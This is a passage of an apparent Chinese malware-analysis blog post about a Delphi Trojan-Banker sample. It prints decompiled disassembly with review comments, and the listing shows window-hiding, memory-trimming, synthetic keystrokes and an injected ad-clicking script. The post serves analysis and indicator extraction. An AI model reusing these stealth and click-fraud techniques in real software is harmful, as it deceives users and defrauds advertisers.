
Trojan-Banker.Win32.Banker (2)

2013年06月18日 ⁄ 综合 ⁄ 共 35877字 ⁄ 字号 评论关闭

使用spy监视木马进程,发现该进程不停地收到WM_TIMER消息,估计木马使用定时器监控IE的启动情况

木马使用delphi编写.

先使用OllyDbg反汇编Coilk.exe,发现

代码中有{985483CD-DCDE-4817-AF35-F17411836625},用Google搜索后发现是Trojan-Banker病毒

代码中有TInterfacedObject,用百度搜索后发现是Delphi的类

再下载DeDe反编译,代码如下

Xaze.dll

unit Uqwt;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics,
Controls, Forms, Dialogs, StdCtrls
type
// Form class as recovered by DeDe from the sample.
// Components visible here: three embedded TWebBrowser controls (Webb1, Webb,
// webb2), a TIdHTTP client and the TTimer ti_ZipMemory.
// NOTE(review): DeDe prints every handler as (Sender : TObject). The
// disassembly of the browser event handlers reads ecx and [ebp+$08] and
// returns with "ret $0004", so the real event signatures carry more
// parameters than shown.
// NOTE(review): the _PROC_xxxxxxxx entries are DeDe's guesses at procedure
// starts. In this listing _PROC_004BA92A and _PROC_004BAA38 decode as data,
// and _PROC_004BA961 / _PROC_004BAA95 begin at "mov ebp, esp", i.e. apparently
// one byte after the real entry point.
Tfrm_SSMoon=class(TForm)
ti_ZipMemory: TTimer;
Panel1: TPanel;
Webb1: TWebBrowser;
IdHTTP: TIdHTTP;
Webb: TWebBrowser;
webb2: TWebBrowser;
RzColorPicker1: TRzColorPicker;
GroupBox1: TGroupBox;
Edit1: TEdit;
Memo1: TMemo;
procedure FormCreate(Sender : TObject);
procedure WebbDocumentComplete(Sender : TObject);
procedure FormClose(Sender : TObject);
procedure FormActivate(Sender : TObject);
procedure ti_ZipMemoryTimer(Sender : TObject);
procedure webb2DocumentComplete(Sender : TObject);
procedure webb2NewWindow2(Sender : TObject);
procedure WebbNewWindow2(Sender : TObject);
procedure _PROC_004BA92A(Sender : TObject);
procedure _PROC_004BA961(Sender : TObject);
procedure _PROC_004BAA38(Sender : TObject);
procedure _PROC_004BAA95(Sender : TObject);
procedure _PROC_004BACE1(Sender : TObject);
procedure _PROC_004BAD08(Sender : TObject);
procedure _PROC_004BAD51(Sender : TObject);
procedure _PROC_004BB33D(Sender : TObject);
procedure _PROC_004BB5A5(Sender : TObject);
procedure _PROC_004BB800(Sender : TObject);
procedure _PROC_004BBD09(Sender : TObject);
procedure _PROC_004BBDE4(Sender : TObject);
procedure _PROC_004BC071(Sender : TObject);
procedure _PROC_004BC5C5(Sender : TObject);
procedure _PROC_004BC843(Sender : TObject);
procedure _PROC_004BC859(Sender : TObject);
procedure _PROC_004BCA70(Sender : TObject);
procedure _PROC_004BCE8D(Sender : TObject);
procedure _PROC_004BCF10(Sender : TObject);
procedure _PROC_004BD43C(Sender : TObject);
procedure _PROC_004BD598(Sender : TObject);
procedure _PROC_004BD60F(Sender : TObject);
procedure _PROC_004BD618(Sender : TObject);
private
{ Private declarations }
public
{ Public declarations }
end ;

var
frm_SSMoon: Tfrm_SSMoon;

{This file is generated by DeDe Ver 3.50.02 Copyright (c) 1999-2002 DaFixer}

implementation

{$R *.DFM}

// FormCreate: start-up routine of the main form. The body is the raw DeDe
// disassembly, kept verbatim; the notes below summarise what it shows.
//  - GetWindowLongA / SetWindowLongA are called with index $EC (-20,
//    GWL_EXSTYLE). The old value is OR-ed with $00080000 (WS_EX_LAYERED) and
//    $00000080 (WS_EX_TOOLWINDOW), so the window becomes layered and is kept
//    out of the taskbar.
//  - An indirect call through [$004C652C] follows with the arguments
//    (hwnd, 0, 3, 2). That pattern matches SetLayeredWindowAttributes(hwnd, 0,
//    alpha = 3, LWA_ALPHA), i.e. an almost fully transparent window.
//    TODO confirm by resolving the pointer.
//  - The byte returned by 004704D0 is stored via [$004C6268] and compared
//    with 6 and 7 further down; presumably an OS-version code that selects
//    the base directory. TODO confirm.
//  - Two path strings are built: one ending in 'MSPat.XML' (destination via
//    [$004C6248]) and one ending in 'msadotb.htm' (destination via
//    [$004C64D8]). In the branch taken when the byte is neither 6 nor 7 both
//    are placed under 'Program Files\Common Files\System\Ole DB\'. These file
//    names are usable as host-based indicators for this sample.
//  - The one-shot flags at $004CDD78 and $004CDD79 are cleared here; the two
//    DocumentComplete handlers test and set them.
//  - 004ABB70 is called with the 'MSPat.XML' path value and its result is
//    stored in field OFFS_0388 (looks like a loaded configuration object;
//    not confirmed from this listing).
//  - Two TStringList objects (OFFS_038C, OFFS_0390) and a
//    TConntecInternetThread (OFFS_0394, constructed with the value returned
//    by 0044F9A0, which is used as the window handle above) are created.
// NOTE(review): the "Possible String Reference" lines with garbled text refer
// to $004BC006 and $004BC00D, which are the try/finally handler addresses
// inside this routine, not real strings.
procedure Tfrm_SSMoon.FormCreate(Sender : TObject);
begin
(*
004BBE20 55 push ebp
004BBE21 8BEC mov ebp, esp
004BBE23 33C9 xor ecx, ecx
004BBE25 51 push ecx
004BBE26 51 push ecx
004BBE27 51 push ecx
004BBE28 51 push ecx
004BBE29 51 push ecx
004BBE2A 51 push ecx
004BBE2B 51 push ecx
004BBE2C 51 push ecx
004BBE2D 53 push ebx
004BBE2E 56 push esi
004BBE2F 8BD8 mov ebx, eax
004BBE31 33C0 xor eax, eax
004BBE33 55 push ebp

* Possible String Reference to: '檠岕腚^[嬪]?
|
004BBE34 6806C04B00 push $004BC006

***** TRY
|
004BBE39 64FF30 push dword ptr fs:[eax]
004BBE3C 648920 mov fs:[eax], esp
004BBE3F 6AEC push $EC
004BBE41 8BC3 mov eax, ebx

|
004BBE43 E8583BF9FF call 0044F9A0
004BBE48 50 push eax

* Reference to: user32.GetWindowLongA()
|
004BBE49 E802C5F4FF call 00408350
004BBE4E 8BF0 mov esi, eax
004BBE50 81CE00000800 or esi, $00080000
004BBE56 81CE80000000 or esi, $00000080
004BBE5C 56 push esi
004BBE5D 6AEC push $EC
004BBE5F 8BC3 mov eax, ebx

|
004BBE61 E83A3BF9FF call 0044F9A0
004BBE66 50 push eax

* Reference to: user32.SetWindowLongA()
|
004BBE67 E834C7F4FF call 004085A0
004BBE6C 6A02 push $02
004BBE6E 6A03 push $03
004BBE70 6A00 push $00
004BBE72 8BC3 mov eax, ebx

|
004BBE74 E8273BF9FF call 0044F9A0
004BBE79 50 push eax
004BBE7A A12C654C00 mov eax, dword ptr [$004C652C]
004BBE7F 8B00 mov eax, [eax]
004BBE81 FFD0 call eax
004BBE83 8D45FC lea eax, [ebp-$04]

* Reference to : TWebBrowser._PROC_004704D0()
|
004BBE86 E84546FBFF call 004704D0
004BBE8B 8B1568624C00 mov edx, [$004C6268]
004BBE91 8802 mov [edx], al
004BBE93 C60578DD4C0000 mov byte ptr [$004CDD78], $00
004BBE9A C60579DD4C0000 mov byte ptr [$004CDD79], $00
004BBEA1 8D45FC lea eax, [ebp-$04]
004BBEA4 50 push eax
004BBEA5 8D55F4 lea edx, [ebp-$0C]
004BBEA8 33C0 xor eax, eax

|
004BBEAA E8CD74F4FF call 0040337C
004BBEAF 8B45F4 mov eax, [ebp-$0C]
004BBEB2 8D55F8 lea edx, [ebp-$08]

|
004BBEB5 E876EAF4FF call 0040A930
004BBEBA 8B45F8 mov eax, [ebp-$08]
004BBEBD B903000000 mov ecx, $00000003
004BBEC2 BA01000000 mov edx, $00000001

|
004BBEC7 E8209BF4FF call 004059EC
004BBECC A168624C00 mov eax, dword ptr [$004C6268]
004BBED1 803806 cmp byte ptr [eax], $06
004BBED4 740A jz 004BBEE0
004BBED6 A168624C00 mov eax, dword ptr [$004C6268]
004BBEDB 803807 cmp byte ptr [eax], $07
004BBEDE 7527 jnz 004BBF07
004BBEE0 8D45EC lea eax, [ebp-$14]

* Reference to : TWebBrowser._PROC_00470A04()
|
004BBEE3 E81C4BFBFF call 00470A04
004BBEE8 8B45EC mov eax, [ebp-$14]
004BBEEB 8D55F0 lea edx, [ebp-$10]

|
004BBEEE E83DEAF4FF call 0040A930
004BBEF3 8B55F0 mov edx, [ebp-$10]
004BBEF6 A148624C00 mov eax, dword ptr [$004C6248]

* Possible String Reference to: 'MSPat.XML'
|
004BBEFB B91CC04B00 mov ecx, $004BC01C

|
004BBF00 E80799F4FF call 0040580C
004BBF05 EB1C jmp 004BBF23
004BBF07 FF75FC push dword ptr [ebp-$04]

* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BBF0A 6830C04B00 push $004BC030

* Possible String Reference to: 'MSPat.XML'
|
004BBF0F 681CC04B00 push $004BC01C
004BBF14 A148624C00 mov eax, dword ptr [$004C6248]
004BBF19 BA03000000 mov edx, $00000003

|
004BBF1E E86599F4FF call 00405888
004BBF23 A168624C00 mov eax, dword ptr [$004C6268]
004BBF28 803806 cmp byte ptr [eax], $06
004BBF2B 740A jz 004BBF37
004BBF2D A168624C00 mov eax, dword ptr [$004C6268]
004BBF32 803807 cmp byte ptr [eax], $07
004BBF35 7527 jnz 004BBF5E
004BBF37 8D45E4 lea eax, [ebp-$1C]

* Reference to : TWebBrowser._PROC_00470A04()
|
004BBF3A E8C54AFBFF call 00470A04
004BBF3F 8B45E4 mov eax, [ebp-$1C]
004BBF42 8D55E8 lea edx, [ebp-$18]

|
004BBF45 E8E6E9F4FF call 0040A930
004BBF4A 8B55E8 mov edx, [ebp-$18]
004BBF4D A1D8644C00 mov eax, dword ptr [$004C64D8]

* Possible String Reference to: 'msadotb.htm'
|
004BBF52 B964C04B00 mov ecx, $004BC064

|
004BBF57 E8B098F4FF call 0040580C
004BBF5C EB24 jmp 004BBF82
004BBF5E 8D45E0 lea eax, [ebp-$20]

* Reference to : TWebBrowser._PROC_004709B0()
|
004BBF61 E84A4AFBFF call 004709B0
004BBF66 FF75E0 push dword ptr [ebp-$20]

* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BBF69 6830C04B00 push $004BC030

* Possible String Reference to: 'msadotb.htm'
|
004BBF6E 6864C04B00 push $004BC064
004BBF73 A1D8644C00 mov eax, dword ptr [$004C64D8]
004BBF78 BA03000000 mov edx, $00000003

|
004BBF7D E80699F4FF call 00405888
004BBF82 A148624C00 mov eax, dword ptr [$004C6248]
004BBF87 8B00 mov eax, [eax]
004BBF89 33D2 xor edx, edx

|
004BBF8B E8E0FBFEFF call 004ABB70

* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BBF90 898388030000 mov [ebx+$0388], eax
004BBF96 8BC3 mov eax, ebx

|
004BBF98 E8D3000000 call 004BC070
004BBF9D 8BC3 mov eax, ebx

* Reference to : Tfrm_SSMoon._PROC_004BCA70()
|
004BBF9F E8CC0A0000 call 004BCA70
004BBFA4 B201 mov dl, $01

* Reference to class TStringList
|
004BBFA6 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BBFAB E86885F4FF call 00404518

* Reference to field Tfrm_SSMoon.OFFS_038C
|
004BBFB0 89838C030000 mov [ebx+$038C], eax
004BBFB6 B201 mov dl, $01

* Reference to class TStringList
|
004BBFB8 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BBFBD E85685F4FF call 00404518

* Reference to field Tfrm_SSMoon.OFFS_0390
|
004BBFC2 898390030000 mov [ebx+$0390], eax
004BBFC8 8BC3 mov eax, ebx

|
004BBFCA E8D139F9FF call 0044F9A0
004BBFCF 8BC8 mov ecx, eax
004BBFD1 B201 mov dl, $01

* Reference to class TConntecInternetThread
|
004BBFD3 A1141C4700 mov eax, dword ptr [$00471C14]

|
004BBFD8 E8A35CFBFF call 00471C80

* Reference to field Tfrm_SSMoon.OFFS_0394
|
004BBFDD 898394030000 mov [ebx+$0394], eax
004BBFE3 A158674C00 mov eax, dword ptr [$004C6758]
004BBFE8 C60000 mov byte ptr [eax], $00
004BBFEB 33C0 xor eax, eax
004BBFED 5A pop edx
004BBFEE 59 pop ecx
004BBFEF 59 pop ecx
004BBFF0 648910 mov fs:[eax], edx

****** FINALLY
|

* Possible String Reference to: '^[嬪]?
|
004BBFF3 680DC04B00 push $004BC00D
004BBFF8 8D45E0 lea eax, [ebp-$20]
004BBFFB BA08000000 mov edx, $00000008

|
004BC000 E81395F4FF call 00405518
004BC005 C3 ret

|
004BC006 E9D18CF4FF jmp 00404CDC
004BC00B EBEB jmp 004BBFF8

****** END
|
004BC00D 5E pop esi
004BC00E 5B pop ebx
004BC00F 8BE5 mov esp, ebp
004BC011 5D pop ebp
004BC012 C3 ret

*)
end;

// WebbDocumentComplete: DocumentComplete handler of the Webb browser control.
// The body is the raw DeDe disassembly, kept verbatim. What it shows:
//  - One-shot guard: nothing is done if the flag at $004CDD78 is already set,
//    if the ecx argument differs from the value 00470444 returns for Webb, or
//    if field OFFS_0388 of the global form pointer [$004CDD54] is nil.
//    Otherwise the flag is set to 1.
//  - Property dispid $CB (203; Document in the SHDocVw type library) is read
//    from Webb and an interface derived from it is stored in the global
//    $004CDD60. A call through vtable slot +$01B0 of that interface yields a
//    second interface that is stored in $004CDD64 (presumably the document's
//    parent window; TODO confirm against the IIDs at $004BC844 / $004BC854).
//  - A TStringList is filled with a minimal HTML page: a hidden anchor with
//    id "adid" and a script function ClickAD(adcode) that assigns adcode to
//    the anchor's href and calls click() on it.
//  - The list is written to a TMemoryStream (virtual slot +$78), wrapped in a
//    TStreamAdapter and passed to vtable slot +$14 of an interface obtained
//    from Webb's document. This looks like loading the page from memory via
//    IPersistStreamInit.Load; not confirmed from this listing.
//  - Both helper objects are released in the inner finally block.
// NOTE(review): the injected page plus ClickAD is ad-click automation inside
// an embedded browser; the literal strings 'adid' and 'ClickAD(' are stable
// markers for identifying this sample.
procedure Tfrm_SSMoon.WebbDocumentComplete(Sender : TObject);
begin
(*
004BC668 55 push ebp
004BC669 8BEC mov ebp, esp
004BC66B 6A00 push $00
004BC66D 6A00 push $00
004BC66F 6A00 push $00
004BC671 6A00 push $00
004BC673 6A00 push $00
004BC675 6A00 push $00
004BC677 6A00 push $00
004BC679 53 push ebx
004BC67A 56 push esi
004BC67B 8BF1 mov esi, ecx
004BC67D 8BD8 mov ebx, eax
004BC67F 33C0 xor eax, eax
004BC681 55 push ebp
004BC682 6834C84B00 push $004BC834

***** TRY
|
004BC687 64FF30 push dword ptr fs:[eax]
004BC68A 648920 mov fs:[eax], esp
004BC68D 803D78DD4C0000 cmp byte ptr [$004CDD78], $00
004BC694 0F8564010000 jnz 004BC7FE
004BC69A 8D55F4 lea edx, [ebp-$0C]

* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC69D 8B8370030000 mov eax, [ebx+$0370]

* Reference to : TWebBrowser._PROC_00470444()
|
004BC6A3 E89C3DFBFF call 00470444
004BC6A8 3B75F4 cmp esi, [ebp-$0C]
004BC6AB 0F854D010000 jnz 004BC7FE
004BC6B1 A154DD4C00 mov eax, dword ptr [$004CDD54]
004BC6B6 83B88803000000 cmp dword ptr [eax+$0388], +$00
004BC6BD 0F843B010000 jz 004BC7FE
004BC6C3 C60578DD4C0001 mov byte ptr [$004CDD78], $01
004BC6CA 8D4DF0 lea ecx, [ebp-$10]

* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC6CD 8B8370030000 mov eax, [ebx+$0370]
004BC6D3 BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BC6D8 E86F07FBFF call 0046CE4C
004BC6DD 8B55F0 mov edx, [ebp-$10]
004BC6E0 B860DD4C00 mov eax, $004CDD60
004BC6E5 B944C84B00 mov ecx, $004BC844

|
004BC6EA E891ABF4FF call 00407280
004BC6EF 8D45EC lea eax, [ebp-$14]

|
004BC6F2 E845ABF4FF call 0040723C
004BC6F7 50 push eax
004BC6F8 A160DD4C00 mov eax, dword ptr [$004CDD60]
004BC6FD 50 push eax
004BC6FE 8B00 mov eax, [eax]
004BC700 FF90B0010000 call dword ptr [eax+$01B0]

|
004BC706 E841ACF4FF call 0040734C
004BC70B 8B55EC mov edx, [ebp-$14]
004BC70E B864DD4C00 mov eax, $004CDD64
004BC713 B954C84B00 mov ecx, $004BC854

|
004BC718 E863ABF4FF call 00407280
004BC71D B201 mov dl, $01

* Reference to class TMemoryStream
|
004BC71F A1ACAD4100 mov eax, dword ptr [$0041ADAC]

|
004BC724 E8EF7DF4FF call 00404518
004BC729 8945F8 mov [ebp-$08], eax
004BC72C B201 mov dl, $01

* Reference to class TStringList
|
004BC72E A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BC733 E8E07DF4FF call 00404518
004BC738 8945FC mov [ebp-$04], eax
004BC73B 33C0 xor eax, eax
004BC73D 55 push ebp
004BC73E 68F7C74B00 push $004BC7F7

***** TRY
|
004BC743 64FF30 push dword ptr fs:[eax]
004BC746 648920 mov fs:[eax], esp

* Possible String Reference to: '<html><body><a id="adid" href="#" t
| arget="_blank"></a>'
|
004BC749 BA6CC84B00 mov edx, $004BC86C
004BC74E 8B45FC mov eax, [ebp-$04]
004BC751 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC753 FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: '<script language="javascript">'
|
004BC756 BAACC84B00 mov edx, $004BC8AC
004BC75B 8B45FC mov eax, [ebp-$04]
004BC75E 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC760 FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: 'function ClickAD(adcode){lnk = docu
| ment.getElementById("adid"); if(lnk
| !=null){lnk.href=adcode;lnk.click()
| ;}}'
|
004BC763 BAD4C84B00 mov edx, $004BC8D4
004BC768 8B45FC mov eax, [ebp-$04]
004BC76B 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC76D FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: '</Script></body></html>'
|
004BC770 BA4CC94B00 mov edx, $004BC94C
004BC775 8B45FC mov eax, [ebp-$04]
004BC778 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BC77A FF5138 call dword ptr [ecx+$38]
004BC77D 8B55F8 mov edx, [ebp-$08]
004BC780 8B45FC mov eax, [ebp-$04]
004BC783 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_78
|
004BC785 FF5178 call dword ptr [ecx+$78]
004BC788 6A00 push $00
004BC78A 6A00 push $00
004BC78C 8B45F8 mov eax, [ebp-$08]

|
004BC78F E8842EF6FF call 0041F618
004BC794 6A00 push $00
004BC796 8B4DF8 mov ecx, [ebp-$08]
004BC799 B201 mov dl, $01

* Reference to class TStreamAdapter
|
004BC79B A13CB04100 mov eax, dword ptr [$0041B03C]

|
004BC7A0 E80B82F6FF call 004249B0
004BC7A5 85C0 test eax, eax
004BC7A7 7403 jz 004BC7AC
004BC7A9 83E8EC sub eax, -$14
004BC7AC 50 push eax
004BC7AD 8D4DE4 lea ecx, [ebp-$1C]

* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC7B0 8B8370030000 mov eax, [ebx+$0370]
004BC7B6 BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BC7BB E88C06FBFF call 0046CE4C
004BC7C0 8B55E4 mov edx, [ebp-$1C]
004BC7C3 8D45E8 lea eax, [ebp-$18]
004BC7C6 B964C94B00 mov ecx, $004BC964

|
004BC7CB E8B0AAF4FF call 00407280
004BC7D0 8B45E8 mov eax, [ebp-$18]
004BC7D3 50 push eax
004BC7D4 8B00 mov eax, [eax]
004BC7D6 FF5014 call dword ptr [eax+$14]
004BC7D9 33C0 xor eax, eax
004BC7DB 5A pop edx
004BC7DC 59 pop ecx
004BC7DD 59 pop ecx
004BC7DE 648910 mov fs:[eax], edx

****** FINALLY
|
004BC7E1 68FEC74B00 push $004BC7FE
004BC7E6 8B45F8 mov eax, [ebp-$08]

|
004BC7E9 E85A7DF4FF call 00404548
004BC7EE 8B45FC mov eax, [ebp-$04]

|
004BC7F1 E8527DF4FF call 00404548
004BC7F6 C3 ret

|
004BC7F7 E9E084F4FF jmp 00404CDC
004BC7FC EBE8 jmp 004BC7E6

****** END
|
004BC7FE 33C0 xor eax, eax
004BC800 5A pop edx
004BC801 59 pop ecx
004BC802 59 pop ecx
004BC803 648910 mov fs:[eax], edx

****** FINALLY
|
004BC806 683BC84B00 push $004BC83B
004BC80B 8D45E4 lea eax, [ebp-$1C]

|
004BC80E E829AAF4FF call 0040723C
004BC813 8D45E8 lea eax, [ebp-$18]

|
004BC816 E821AAF4FF call 0040723C
004BC81B 8D45EC lea eax, [ebp-$14]

|
004BC81E E819AAF4FF call 0040723C
004BC823 8D45F0 lea eax, [ebp-$10]

|
004BC826 E811AAF4FF call 0040723C
004BC82B 8D45F4 lea eax, [ebp-$0C]

|
004BC82E E809AAF4FF call 0040723C
004BC833 C3 ret

|
004BC834 E9A384F4FF jmp 00404CDC
004BC839 EBD0 jmp 004BC80B

****** END
|
004BC83B 5E pop esi
004BC83C 5B pop ebx
004BC83D 8BE5 mov esp, ebp
004BC83F 5D pop ebp
004BC840 C20400 ret $0004

*)
end;

// FormClose: close handler of the form (raw DeDe disassembly, kept verbatim).
//  - Writes 2 to the byte that ecx points to; for a Delphi OnClose handler
//    this is presumably "Action := caFree". TODO confirm.
//  - Passes the objects held in fields OFFS_0388, OFFS_038C and OFFS_0390 to
//    00404548, the same routine the other handlers call on their temporary
//    objects in finally blocks (looks like the object release routine).
//  - Clears the global form pointer at $004CDD54.
// NOTE(review): the thread object stored in OFFS_0394 by FormCreate is not
// released here.
procedure Tfrm_SSMoon.FormClose(Sender : TObject);
begin
(*
004BCA40 53 push ebx
004BCA41 8BD8 mov ebx, eax
004BCA43 C60102 mov byte ptr [ecx], $02

* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BCA46 8B8388030000 mov eax, [ebx+$0388]

|
004BCA4C E8F77AF4FF call 00404548

* Reference to field Tfrm_SSMoon.OFFS_038C
|
004BCA51 8B838C030000 mov eax, [ebx+$038C]

|
004BCA57 E8EC7AF4FF call 00404548

* Reference to field Tfrm_SSMoon.OFFS_0390
|
004BCA5C 8B8390030000 mov eax, [ebx+$0390]

|
004BCA62 E8E17AF4FF call 00404548
004BCA67 33C0 xor eax, eax

* Reference to GlobalVar_004CDD54
|
004BCA69 A354DD4C00 mov dword ptr [$004CDD54], eax
004BCA6E 5B pop ebx
004BCA6F C3 ret

*)
end;

// FormActivate: activation handler (raw DeDe disassembly, kept verbatim).
// Loads the form field at offset $4C, passes it in ecx and its negation in
// edx, and calls 00463270.
// NOTE(review): DeDe labels the callee as a TGlassFrame routine, which is
// probably a mislabel. Passing a negated dimension is consistent with moving
// the form off-screen so it stays invisible. TODO confirm by identifying
// 00463270 and the field at $4C.
procedure Tfrm_SSMoon.FormActivate(Sender : TObject);
begin
(*

* Reference to field Tfrm_SSMoon.OFFS_004C
|
004BD1AC 8B504C mov edx, [eax+$4C]
004BD1AF 8BCA mov ecx, edx
004BD1B1 F7DA neg edx

* Reference to : TGlassFrame._PROC_00463270()
|
004BD1B3 E8B860FAFF call 00463270
004BD1B8 C3 ret

*)
end;

// ti_ZipMemoryTimer: timer handler (raw DeDe disassembly, kept verbatim).
//  - If the global at $004CDD58 is non-zero it is used as the process handle
//    for kernel32.SetProcessWorkingSetSize(handle, -1, -1) ("push $FF" is a
//    sign-extended -1). That call trims the working set, which keeps the
//    memory figure shown for the process small. Any exception is swallowed
//    by the try/except frame.
//  - Afterwards 00437CDC is called on the ti_ZipMemory timer with
//    $001B7740 (1 800 000); presumably this sets Interval to 30 minutes.
//    DeDe labels the callee as a TPanel routine, which looks like a mislabel.
//    TODO confirm.
procedure Tfrm_SSMoon.ti_ZipMemoryTimer(Sender : TObject);
begin
(*
004BD1BC 55 push ebp
004BD1BD 8BEC mov ebp, esp
004BD1BF 51 push ecx
004BD1C0 53 push ebx
004BD1C1 56 push esi
004BD1C2 57 push edi
004BD1C3 8945FC mov [ebp-$04], eax
004BD1C6 833D58DD4C0000 cmp dword ptr [$004CDD58], +$00
004BD1CD 7631 jbe 004BD200
004BD1CF 33C0 xor eax, eax
004BD1D1 55 push ebp
004BD1D2 68F6D14B00 push $004BD1F6

***** TRY
|
004BD1D7 64FF30 push dword ptr fs:[eax]
004BD1DA 648920 mov fs:[eax], esp
004BD1DD 6AFF push $FF
004BD1DF 6AFF push $FF
004BD1E1 A158DD4C00 mov eax, dword ptr [$004CDD58]
004BD1E6 50 push eax

* Reference to: kernel32.SetProcessWorkingSetSize()
|
004BD1E7 E8D4ABF4FF call 00407DC0
004BD1EC 33C0 xor eax, eax
004BD1EE 5A pop edx
004BD1EF 59 pop ecx
004BD1F0 59 pop ecx
004BD1F1 648910 mov fs:[eax], edx
004BD1F4 EB0A jmp 004BD200

|
004BD1F6 E92D78F4FF jmp 00404A28

|
004BD1FB E8387CF4FF call 00404E38

****** END
|
004BD200 8B45FC mov eax, [ebp-$04]

* Reference to control Tfrm_SSMoon.ti_ZipMemory : TTimer
|
004BD203 8B8060030000 mov eax, [eax+$0360]
004BD209 BA40771B00 mov edx, $001B7740

* Reference to : TPanel._PROC_00437CDC()
|
004BD20E E8C9AAF7FF call 00437CDC
004BD213 5F pop edi
004BD214 5E pop esi
004BD215 5B pop ebx
004BD216 59 pop ecx
004BD217 5D pop ebp
004BD218 C3 ret

*)
end;

// webb2DocumentComplete: DocumentComplete handler of the webb2 browser
// control (raw DeDe disassembly, kept verbatim). What it shows:
//  - One-shot guard on the flag at $004CDD79. The handler also returns early
//    unless the ecx argument equals webb2's property with dispid $C8 (200;
//    Application in the SHDocVw type library), which would restrict it to the
//    top-level document rather than a frame. TODO confirm.
//  - The interface global at $004CDD5C is cleared via 0040723C.
//  - user32.SetForegroundWindow is called on the global form's window handle.
//  - The Document ($CB) of webb2 is fetched; vtable slot +$01B0 is called on
//    it and slot +$00EC on the result (looks like obtaining the parent window
//    and giving it focus; not confirmed).
//  - A string '{TAB ' + <number from [OFFS_0388 + $2C]> + <constant at
//    $004BD36C> is built and passed to 004ADDD0. The '{TAB n}' form matches
//    SendKeys-style syntax, so this appears to send n synthetic TAB key
//    presses to the focused page. TODO confirm 004ADDD0.
//  - SetForegroundWindow is then called with the handle at [[$004C6260]].
// NOTE(review): a hidden window that takes the foreground and synthesises
// keystrokes is a useful behavioural indicator when triaging this sample.
procedure Tfrm_SSMoon.webb2DocumentComplete(Sender : TObject);
begin
(*
004BD21C 55 push ebp
004BD21D 8BEC mov ebp, esp
004BD21F 6A00 push $00
004BD221 6A00 push $00
004BD223 6A00 push $00
004BD225 6A00 push $00
004BD227 6A00 push $00
004BD229 53 push ebx
004BD22A 56 push esi
004BD22B 8BF1 mov esi, ecx
004BD22D 8BD8 mov ebx, eax
004BD22F 33C0 xor eax, eax
004BD231 55 push ebp
004BD232 6844D34B00 push $004BD344

***** TRY
|
004BD237 64FF30 push dword ptr fs:[eax]
004BD23A 648920 mov fs:[eax], esp
004BD23D 803D79DD4C0000 cmp byte ptr [$004CDD79], $00
004BD244 0F85C7000000 jnz 004BD311
004BD24A 8D4DFC lea ecx, [ebp-$04]
004BD24D BAC8000000 mov edx, $000000C8

* Reference to control Tfrm_SSMoon.webb2 : TWebBrowser
|
004BD252 8B8374030000 mov eax, [ebx+$0374]

* Reference to : TOleControl._PROC_0046CE4C()
|
004BD258 E8EFFBFAFF call 0046CE4C
004BD25D 3B75FC cmp esi, [ebp-$04]
004BD260 0F85AB000000 jnz 004BD311
004BD266 C60579DD4C0001 mov byte ptr [$004CDD79], $01
004BD26D B85CDD4C00 mov eax, $004CDD5C

|
004BD272 E8C59FF4FF call 0040723C
004BD277 A154DD4C00 mov eax, dword ptr [$004CDD54]

|
004BD27C E81F27F9FF call 0044F9A0
004BD281 50 push eax

* Reference to: user32.SetForegroundWindow()
|
004BD282 E8C1B2F4FF call 00408548
004BD287 8D45F8 lea eax, [ebp-$08]

|
004BD28A E8AD9FF4FF call 0040723C
004BD28F 50 push eax
004BD290 8D4DF4 lea ecx, [ebp-$0C]
004BD293 A154DD4C00 mov eax, dword ptr [$004CDD54]

* Reference to control webb2 : TWebBrowser
|
004BD298 8B8074030000 mov eax, [eax+$0374]
004BD29E BACB000000 mov edx, $000000CB

* Reference to : TOleControl._PROC_0046CE4C()
|
004BD2A3 E8A4FBFAFF call 0046CE4C
004BD2A8 8B45F4 mov eax, [ebp-$0C]
004BD2AB 50 push eax
004BD2AC 8B00 mov eax, [eax]
004BD2AE FF90B0010000 call dword ptr [eax+$01B0]

|
004BD2B4 E893A0F4FF call 0040734C
004BD2B9 8B45F8 mov eax, [ebp-$08]
004BD2BC 50 push eax
004BD2BD 8B00 mov eax, [eax]
004BD2BF FF90EC000000 call dword ptr [eax+$00EC]

|
004BD2C5 E882A0F4FF call 0040734C

* Possible String Reference to: '{TAB '
|
004BD2CA 685CD34B00 push $004BD35C
004BD2CF 8D55EC lea edx, [ebp-$14]

* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BD2D2 8B8388030000 mov eax, [ebx+$0388]
004BD2D8 8B402C mov eax, [eax+$2C]

|
004BD2DB E82CCFF4FF call 0040A20C
004BD2E0 FF75EC push dword ptr [ebp-$14]
004BD2E3 686CD34B00 push $004BD36C
004BD2E8 8D45F0 lea eax, [ebp-$10]
004BD2EB BA03000000 mov edx, $00000003

|
004BD2F0 E89385F4FF call 00405888
004BD2F5 8B45F0 mov eax, [ebp-$10]

|
004BD2F8 E88786F4FF call 00405984
004BD2FD 33D2 xor edx, edx

|
004BD2FF E8CC0AFFFF call 004ADDD0
004BD304 A160624C00 mov eax, dword ptr [$004C6260]
004BD309 8B00 mov eax, [eax]
004BD30B 50 push eax

* Reference to: user32.SetForegroundWindow()
|
004BD30C E837B2F4FF call 00408548
004BD311 33C0 xor eax, eax
004BD313 5A pop edx
004BD314 59 pop ecx
